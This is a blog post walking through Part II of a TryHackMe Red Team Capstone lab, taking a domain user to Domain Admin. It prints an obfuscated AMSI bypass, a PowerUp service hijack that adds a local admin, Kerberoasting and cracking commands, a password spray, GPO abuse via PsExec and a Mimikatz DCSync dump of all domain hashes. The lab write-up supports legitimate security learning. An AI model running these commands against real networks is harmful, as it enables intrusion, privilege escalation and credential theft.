Sitemap
Open in app

Sign in

Medium Logo
Write
Search

Sign in

TryHackMe Red Team Capstone Walkthrough, Part II: Escalation to Domain Admin

8 min readSep 7, 2025
Press enter or click to view image in full size

TL;DR walkthrough of the Red Team Capstone network on TryHackMe. This is Part II: Escalation to Domain Admin.

THM Walkthroughs:

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Our Red Team Capstone Walkthrough Series

There are four parts to this walkthrough of the Red Team Capstone due to the sheer size of the network:

I will add a link to the last part once I post it. Currently it only exists in raw notes and screenshots.

Background

We left off Part I: Initial Access with access to a domain workstation as a Domain User.

xfreerdp /u:mohammad.ahmed /p:'Password1!' +clipboard /dynamic-resolution /cert:ignore /v:10.200.89.21 /drive:share,/home/kali/Downloads/RedTeam

On an admin note, Kali can only reach .21 and .22 directly. These are named WRK1 and WRK2 on the corp.thereserve.loc domain. This really isn’t an issue though. I simply put my Windows tools like Mimikatz and Rubeus in the RedTeam folder and then mapped it as a share drive via xfreerdp.

I could then RDP to subsequent VMs from my foothold on .21 and simply copy/paste to and from them from the .21 VM.

I did not screw around with setting up a tunnel or a forwarder on .21, my foothold VM. There was no need to.

If you were putting the flags in as you go then your diagram will look like this.

Press enter or click to view image in full size

Please note that I am going to leave out all the tangents I went off on that did not lead to Domain Admin. For example I dumped credentials on WRK1, WRK2, and Server1 once I compromised them. Just know that I’m not smart, clever, or lucky enough to go through escalation to Domain Admin as succinctly as I’m showing in this walkthrough. I’m merely leaving out the dead ends I took along the way and only describing the steps that were applicable.

Getting local admin rights

wmic computersystem get domain

This confirms that the domain is corp.thereserve.loc. Note that most of the VMs only respond to their FQDN or IP address.

crackmapexec smb IPs.txt -u mohammad.ahmed -p 'Password1!' -d corp.thereserve.loc --continue-on-success
Press enter or click to view image in full size

We have RDP access to .21 & .22. We are in the helpdesk group. We don’t have local admin to either VM. This just will not do, we need local admin so we can enable Windows features, disable Defender, and run our tools like Rubeus on our foothold system.

I copy/pasted the AMSI bypass

S`eT-It`em ( 'V'+'aR' +  'IA' + (("{1}{0}"-f'1','blE:')+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a'))  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

and then ran PowerUp.ps1 directly from the Kali share drive. This works even with Defender enabled as it doesn’t write to disc on the VM. The easy way to do this is to navigate to the share drive, Shift + right click, and ‘Open PowerShell window here’.

. .\PowerUp.ps1
Write-ServiceBinary -Name 'Backup' -Path "C:\Backup Service\Full Backup\backup.exe" -Command "net user john Password123! /add && timeout /t 5 && net localgroup Administrators john /add"
net start backup

You may have to restart the VM or just wait for THM’s timer to run out, or you may get lucky and all you have to do is logout and then RDP in as john. I used john’s local admin account to add corp\mohammad.ahmed to Administrators on WRK1, aka .21. This is because while having local admin is great, having a Domain User who is also a local admin is better when it comes to running tools like Rubeus.

Domain enumeration

I do have one small complaint with the Red Team Capstone; none of the VMs except the DCs had RSAT enabled. Even the DC didn’t have the AD PowerShell module added. I was able to enable these features of course once I gained local admin, but it’s annoying, particularly given a less than stellar connection speed and performance on THM VMs.

Those who have worked helpdesk like I have probably know to run appwiz.cpl -> turn Windows features on or off -> Manage -> Add roles or features -> hit Next 4x -> and check the Features you want as shown below.

Press enter or click to view image in full size

Sure I could have used PowerShell to add them but that command isn’t in my AD cheat sheet yet. I’ll have to add it later. At any rate, I’m ok with using the GUI for one offs like this.

Once RSAT is enabled we can run dsa.msc and easily see all the computers, users, OUs, etc in the domain.

We can also turn off Defender, run SharpHound.exe on the Kali share drive, and collect data for BloodHound.

I ran BloodHound on Kali. I posted a howto on setting up BloodHound on Windows and Kali here if you don’t already have it setup.

./neo4j-desktop-1.6.0-x86_64.AppImage
bloodhound

Lateral movement

BloodHound identified multiple accounts that we can Kerberoast, so let’s try Kerberoasting.

Normally I would run this attack from Kali using impacket, but remember that Kali can’t directly access the CORP domain’s DC.

/usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request corp.thereserve.loc/mohammad.ahmed:Password1\! -dc-ip 10.200.89.102 -outputfile /home/kali/Downloads/RedTeam/hashes.txt

Hence I copy/pasted Rubeus.exe to the .21 VM and used it to Kerberoast.

.\Rubeus.exe kerberoast /outfile:hashes.txt
Press enter or click to view image in full size

I then simply copy/pasted hashes.txt to Kali using the xfreerdp share drive. This is why using xfreerdp to map a share drive is so handy.

I used john on Kali to try cracking the hashes and got one hit.

john --format=krb5tgs hashes.txt --wordlist=/home/kali/rockyou.txt
Press enter or click to view image in full size

How do we know what user account ‘Password1!’ belongs to though? Easy, copy/paste the usernames with SPNs to users.txt and spray that password.

crackmapexec smb 10.200.89.21 -U users.txt -p 'Password1!'
Press enter or click to view image in full size

Nice, we have more credentials:

SVCSCANNING \ Password1!

Normally I would use crackmapexec on Kali to find what additional systems svcscanning has rights to, but remember that Kali can only access .21 & .22. There’s only 2 other VMs in this domain besides the DC though, so I simply tried to RDP to them from .21 as corp\svcscanning.

It turns out that svcscanning is already a local admin on both .31 and .32, aka Server1 and Server2.

BloodHound

I went back to Kali and marked those VMs as owned in BloodHound … and what do we find?

Press enter or click to view image in full size
Holy ****, we’re about to p0wn this thing

Look at that, Server1 and Server2 both have an escalation path directly to Domain Admin. BloodHound showed a more convoluted way of doing so then required, but then again maybe I just need to update my Kali VM to the latest version.

The gist of this escalation path is:

  • The computer accounts themselves were delegated GenericWrite on a GPO that is applied to the Domain Controllers OU.
  • This means that the computers themselves can modify that GPO and make changes directly on the DCs.
  • This means that anyone who has local admin access to Server1 or Server2 can change that GPO.
  • In other words, anyone who has local admin on Server1 or Server2 is one small step away from making themselves a Domain Admin.

Escalation to Domain Admin

I copy/pasted PSTools to Server1 & unzipped them. This is trivial as I had my share drive with tools mapped on .21 and I was then RDPed from .21 into .31. I didn’t even have to disable Defender as PSTools was originally developed by Sysinternals, who were later bought by Microsoft. In other words the PsTools Suite is a legitimate Microsoft tool set that we are simply abusing. You can download it from Microsoft here if you don’t already have it handy.

I ran appwiz.cpl and added the Group Policy Management feature to Server1 as described earlier.

I then ran the Group Policy Management Console as the computer account itself rather than as my user account, svcscanning, via PsExec, part of PSTools.

.\PsExec.exe -s -i mmc.exe gpmc.msc

I then simply navigated to

Computer Configuration \ Policies \ Windows Settings \ Security Settings \ Restricted Groups

And added the group corp\Domain Admins. I then added the two users I had compromised, corp\mohammad.ahmed and corp\svcscanning, to Domain Admins.

That’s it. I went and played video games or read the news, I don’t remember now, while I waited for Group Policy to update on the DC: CORPDC.corp.thereserve.loc. Ironically if the time runs out on the room and the network shuts down it helps us as Computer Configuration settings in a GPO are set at system startup. Simply hit Start on the Red Team Capstone page to fire the network back up and bam, our GPO sets in.

Post compromise

The first thing I did after Group Policy updated and I got Domain Admin was to RDP into CORPDC, .102, turn off Defender, copy/paste Invoke-Mimi.ps1 from the Kali share drive on .21, and

. .\Invoke-Mimi.ps1
Invoke-Mimi -Command '"token::elevate" "privilege::debug" "lsadump::dcsync /dc:CORPDC /domain:corp.thereserve.loc /all"' | Out-File .\AllCorpHashes.txt

I’m showing the full, uncropped screenshot below so everyone can see exactly what I did. I ran it first without thinking to save the output to a file, then needlessly tried to export to CSV, then simply exported to *.txt. You can also see how I’m running Kali in a VM, connected to .21 over xfreerdp, and then RDPed into .102.

Press enter or click to view image in full size

I then copy/pasted AllCorpHashes.txt back down to .21 and my Kali share drive. There’s a specific NTLM hash in there that will be critical to the next step in our escalation to Enterprise Admin.

Summary

If you’ve looked at some of the more in depth howtos I linked to my AD cheat sheet like this one then you already know what I did next. Hell I went back, checked my own howto, and then ran the next escalation in the Red Team Capstone. I say all the time that while I claim that these posts are aimed at sysadmins, auditors, and security folks … if I’m being honest then the intended audience of these posts is myself a year or two down the road. My own howto that I checked to proceed further was written 2 years and 4 months ago.

Well this wraps up Part II of our Red Team Capstone Walkthrough. Join us in Part III where we escalate to Enterprise Admin, explore the other child domain in this forest, find the SWIFT banking application, and get into it.

References

Computer Configuration vs User Configuration in GPOs: https://learn.microsoft.com/en-us/answers/questions/51907/difference-between-computer-and-user-objects-in-ac

Tryhackme
Tryhackme Walkthrough
Tryhackme Writeup
Windows Domain Security
Active Directory Security

--

--

Rich
Rich

Written by Rich

536 followers
10 following

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech